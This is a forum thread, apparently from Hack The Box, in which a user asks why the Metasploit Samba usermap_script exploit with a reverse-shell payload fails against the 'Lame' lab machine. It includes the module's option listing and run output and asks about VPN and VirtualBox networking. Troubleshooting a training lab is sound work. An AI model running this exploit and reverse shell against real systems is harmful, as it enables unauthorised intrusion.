Lame Machine Problem Metasploit

Greeting to All member,
I am just tried to follow walkthrough: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-lame/. The tutorial that I followed is a dead end when exploit “multi/samba/usermap_script” and give me message “Exploit completed, but no session was created” with detail as follow:

msf5 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description


RHOSTS 10.10.10.3 yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)

Payload options (cmd/unix/reverse):

Name Current Setting Required Description


LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Automatic

msf5 exploit(multi/samba/usermap_script) > run

[] Started reverse TCP double handler on 10.0.2.15:4444
[
] Exploit completed, but no session was created.

My Kali machine is running on virtualbox with NAT network mode and the openvpn is running on mac osx, outside the virtualbox. Are there missing vpn configuration that make the metasploit session can not work? I am also tried run openvpn inside the virtualbox, but the result is worst, I can not ping any hackthebox machine. Please help me out.

My regards,

SakaHeroji

I wish i could delete my post…

@HaxGoat said:
I wish i could delete my post…

What do you mean?